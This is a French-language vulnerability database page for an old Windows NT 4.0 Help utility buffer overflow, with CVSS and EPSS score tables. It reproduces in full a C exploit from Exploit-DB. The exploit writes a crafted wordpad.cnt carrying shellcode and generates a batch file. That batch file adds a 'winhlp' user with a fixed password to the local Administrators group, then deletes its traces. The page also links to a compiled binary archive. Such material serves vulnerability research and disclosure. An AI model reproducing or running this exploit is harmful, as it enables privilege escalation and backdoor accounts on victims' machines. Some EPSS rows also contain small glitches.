CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Buffer overflow in Windows NT 4.0 help file utility via a malformed help file.
Informations du CVE
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
4.6
AV:L/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
2.74%
–
–
2022-03-20
–
–
2.74%
–
–
2022-04-03
–
–
2.74%
–
–
2022-05-29
–
–
2.74%
–
–
2022-12-18
–
–
2.74%
–
–
2023-01-01
–
–
2.74%
–
–
2023-02-05
–
–
2.74%
–
–
2023-03-12
–
–
–
0.08%
–
2023-07-09
–
–
–
0.08%
–
2024-02-11
–
–
–
0.05%
–
2024-03-03
–
–
–
0.05%
–
2024-04-07
–
–
–
0.05%
–
2024-06-02
–
–
–
0.05%
–
2024-06-16
–
–
–
0.05%
–
2024-10-13
–
–
–
0.05%
–
2024-12-15
–
–
–
0.05%
–
2024-12-22
–
–
–
0.05%
–
2024-12-29
–
–
–
0.05%
–
2025-03-09
–
–
–
0.05%
–
2025-01-19
–
–
–
0.05%
–
2025-03-09
–
–
–
0.05%
–
2025-03-18
–
–
–
–
0.78%
2025-03-30
–
–
–
–
1.3%
2025-04-15
–
–
–
–
1.3%
2025-04-15
–
–
–
–
1.3,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 1999-05-16 22h00 +00:00 Auteur : David Litchfield EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/261/info
//
// Lax permission in the Windows NT help file folder and a buffer overflow in the Help utility may allow malicious users to gain Administrator privileges.
//
// The Windows NT Help utility parses and displays help information for selected applications. The help files are stored in the %SystemRoot%\help directory. The default permissions in this directory allow any user to add new files.
//
// A buffer overflow exists in the Help utility when it attempts to read a .cnt file with an overly long heading string. Content tab informaton files ("".cnt"") are generated when rich text format files ("".rtf"") are translated to help files ("".hlp""). If the string is longer than 507 bytes winhlp32 truncates the entry and the buffer overflow does not occur.
//
// A malicious user can create a custom .cnt help file with executable code in an entry string which when stored in the help directory and viewed by an unsuspecting user can grant them that users privileges.
//
// The vulnerability is not limited by the permissions of the help file directory as the Help utility will search for a .cnt file first in its execution directory before looking in the help file directory.
//
#include <stdio.h>
#include <windows.h>
#include <string.h>
int main(void)
{
char eip[5]=""\xE5\x27\xF3\x77"";
char
ExploitCode[200]=""\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x1A\x38\xF1\x77\x52\x8D\x45\xF4\x50\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x41\xC6\x45\xFD\x44\xC6\x45\xFE\x44\xB8\xE1\xE1\xA0\x77\x50\x8D\x45\xFC\x50\xFF\x55\xF8\x55\x8B\xEC\xBA\xBA\x5B\x9F\x77\x52\x33\xC0\x50\xFF\x55\xFC"";
FILE *fd;
printf(""\n\n*******************************************************\n"");
printf(""* WINHLPADD exploits a buffer overrun in Winhlp32.exe *\n"");
printf(""* This version runs on Service Pack 4 machines and *\n"");
printf(""* assumes a msvcrt.dll version of 4.00.6201 *\n"");
printf(""* *\n"");
printf(""* (C) David Litchfield (mnemonix@globalnet.co.uk) '99 *\n"");
printf(""*******************************************************\n\n"");
fd = fopen(""wordpad.cnt"", ""r"");
if (fd==NULL)
{
printf(""\n\nWordpad.cnt not found or insufficient rights to access it.\nRun this from the WINNT\\HELP directory"");
return 0;
}
fclose(fd);
printf(""\nMaking a copy of real wordpad.cnt - wordpad.sav\n"");
system(""copy wordpad.cnt wordpad.sav"");
printf(""\n\nCreating wordpad.cnt with exploit code..."");
fd = fopen(""wordpad.cnt"", ""w+"");
if (fd==NULL)
{
printf(""Failed to open wordpad.cnt in write mode. Check you have sufficent rights\n"");
return 0;
}
fprintf(fd,""1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%s%s\n"",eip,ExploitCode);
fprintf(fd,""2 Opening a document=WRIPAD_OPEN_DOC\n"");
fclose(fd);
printf(""\nCreating batch file add.bat\n\n"");
fd = fopen(""add.bat"", ""w"");
if (fd == NULL)
{
printf(""Couldn't create batch file. Manually create one instead"");
return 0;
}
printf(""The batch file will attempt to create a user account called \""winhlp\"" and\n"");
printf(""with a password of \""winhlp!!\"" and add it to the Local Administrators group.\n"");
printf(""Once this is done it will reset the files and delete itself.\n"");
fprintf(fd,""net user winhlp winhlp!! /add\n"");
fprintf(fd,""net localgroup administrators winhlp /add\n"");
fprintf(fd,""del wordpad.cnt\ncopy wordpad.sav wordpad.cnt\n"");
fprintf(fd,""del wordpad.sav\n"");
fprintf(fd,""del add.bat\n"");
fclose(fd);
printf(""\nBatch file created."");
printf(""\n\nCreated. Now open up Wordpad and click on Help\n"");
return 0;
}
NOTE: The attached exploit code has been compiled to run on Windows NT 4.0 SP4 with msvcrt.dll version 4.20.6201
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19209.tar.gz